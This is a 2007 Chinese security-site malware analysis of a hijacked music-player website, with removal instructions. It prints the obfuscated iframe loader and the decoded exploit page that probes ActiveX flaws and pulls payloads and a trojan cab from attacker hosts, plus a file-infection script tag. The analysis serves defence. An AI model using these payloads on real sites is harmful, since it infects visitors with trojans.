向您推荐

警惕“千千静听”官方网站被挂马

出处：中国安全网作者：清新阳光时间：2007-12-28 网址：http://www.securitycn.net

挂马地址：http://wwwcnc.ttplayer.com/index.php
网页前半部分被挂的代码：<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167 \162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");</script><html>
解密后为指向http:\/\/aa.llsging.com\/ww\/new280.htm?016

继续
http:\/\/aa.llsging.com\/ww\/new280.htm?016解密后指向
http://a5.llsging.com/aa/nini.htm
http://a5.llsging.com/aa/gege.htm

http://a5.llsging.com/aa/nini.htm代码：

<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
eval("/*<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>*/
function init(){document.write()}window.onload=init;if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='iepl=orer;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/11.js><\/script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/bb.js><\/script>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/ppp.js><\/script>")}}try{var h;var obj=new ActiveXObject("BaiduBar.Tool")}catch(h){};finally{if(h!="[object Error]"){obj.DloadDS("http://down.llsging.com/bb/bd.cab","bd.exe",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){document.write("<iframe width='10' height='10' src='http://a5.llsging.com/aa/bf.html'></iframe>")}}}}")
</SCRIPT>

http:\/\/a5.llsging.com\/aa\/11.js MS06-014漏洞
http:\/\/a5.llsging.com\/aa\/bb.js 暴风影音漏洞
http:\/\/a5.llsging.com\/aa\/ppp.js PPStream漏洞?
http://down.llsging.com/bb/bd.cab 百度toolbar

http://a5.llsging.com/aa/gege.htm不会解密希望大家帮下忙...

最后下载的仍是一个木马下载者

由于本人才疏学浅，网页解密部分的分析可能存在错误，还请大家指教

下面是该木马下载者的简要分析
File: ntuser.com
Size: 31792 bytes
Modified: 2007年12月22日, 10:19:44
MD5: 5EE5CC57AAD61F73420F874433E526A5
SHA1: 24141C18ACB87CB8E54D924C2E117B8F44926598
CRC32: 605FE6B3

1.病毒运行后，释放如下副本以及文件：
%systemroot%\system32\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去

5.感染全盘的php jsp asp htm html文件在后面写入<script language=javascript src=http://cc.18dd.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作
读取http://*.com/elf_listo.txt的文件列表
下载27个木马和病毒到c:\Program Files下面分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe

木马感染后的sreng日志如下：
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<WinSysM><%systemroot%\608769M.exe> []
<WinSysW><%systemroot%\608769L.exe> []
<Kvsc3><%systemroot%\Kvsc3.exE> []
<AVPSrv><%systemroot%\AVPSrv.exE> []
<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
<DbgHlp32><%systemroot%\DbgHlp32.exe> []

==================================
驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>（之前的comint32.sys，GD*I32.dll，bj*rl.dll，addr*help.dll木马群变种）
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>（机器狗病毒变种）

==================================
正在运行的进程
[PID: 1740][%systemroot%\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%systemroot%\608769MM.DLL] [N/A, ]
[%systemroot%\608769WL.DLL] [N/A, ]
[%systemroot%\system32\SSLDyn.dll] [N/A, ]
[%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\DbgHlp32.dll] [N/A, ]
[PID: 524][C:\Program Files\VMware\VMware Tools\VMwareService.exe] [VMware, Inc., 6.0.1 build-55017]
[%systemroot%\system32\GDQQHXI32.dll] [N/A, ]
[%systemroot%\system32\GDDTHXI32.dll] [N/A, ]
[%systemroot%\system32\GDJZI32.dll] [N/A, ]
[%systemroot%\system32\GDQQSGI32.dll] [N/A, ]
[%systemroot%\system32\GDZYZJI32.dll] [N/A, ]
[%systemroot%\system32\GDDJI32.dll] [N/A, ]
[%systemroot%\system32\GDGFSJI32.dll] [N/A, ]
[%systemroot%\system32\GDMSI32.dll] [N/A, ]
[%systemroot%\system32\GDZXI32.dll] [N/A, ]
[%systemroot%\system32\GDWDI32.dll] [N/A, ]
[%systemroot%\system32\GDGJI32.dll] [N/A, ]
[%systemroot%\system32\GDWLI32.dll] [N/A, ]
[%systemroot%\system32\GDFYI32.dll] [N/A, ]
[%systemroot%\system32\GDZYHXI32.dll] [N/A, ]
[%systemroot%\system32\GDHnXaI32.dll] [N/A, ]
[%systemroot%\system32\GDZHTUI32.dll] [N/A, ]
[%systemroot%\system32\GDWMI32.dll] [N/A, ]
[%systemroot%\system32\GDJX2I32.dll] [N/A, ]

清除办法：
下载sreng：http://download.kztechs.com/files/sreng2.zip
Xdelbox：http://www.dodudou.com/down/里面的原创软件文件夹下

1.解压缩Xdelbox
在添加旁边的框中输入
%systemroot%\system32\drivers\msconkt.sys
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DbgHlp32.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\REGKEY.hiv
%systemroot%\system32\SSLDyn.dll
%systemroot%\system32\wxptdi.sys
%systemroot%\608769L.exe
%systemroot%\608769M.exe
%systemroot%\608769MM.DLL
%systemroot%\608769WL.DLL
%systemroot%\AVPSrv.exE
%systemroot%\cmdbcs.exe
%systemroot%\DbgHlp32.exe
%systemroot%\Kvsc3.exE
%systemroot%\NVDispDRV.EXE
%systemroot%\SSLDyn.exE
%systemroot%\system32\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推）
输入完一个以后点击旁边的添加按钮被添加的文件将出现在下面的大框中
右键点击右键菜单中的 “立即重启执行删除”
重启计算机以后会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
系统会自动选择进入第二个系统
类似dos的界面滚动完毕以后病毒就被删除了
之后会自动重启进入正常模式

2.重启之后
打开sreng
启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<WinSysM><%systemroot%\608769M.exe> []
<WinSysW><%systemroot%\608769L.exe> []
<Kvsc3><%systemroot%\Kvsc3.exE> []
<AVPSrv><%systemroot%\AVPSrv.exE> []
<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
<DbgHlp32><%systemroot%\DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>（之前的comint32.sys变种）
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>（机器狗病毒变种）

3.清除机器狗病毒
参考http://hi.baidu.com/newcenturysun/blog/item/333c67f0891da2aca40f5236.html
解决方法第三点即可

4.清除GD*I32.dll，bj*rl.dll，addr*help.dll木马群
参考http://hi.baidu.com/newcenturysun/blog/item/7b0aa83195add2ab5fdf0e65.html即可

5.修复被感染的网页文件
推荐使用CSI的iframkill
下载地址：http://www.vaid.cn/blog/read.php?9

文章搜索

中安产品

最新文章

新闻订阅

向您推荐

警惕“千千静听”官方网站被挂马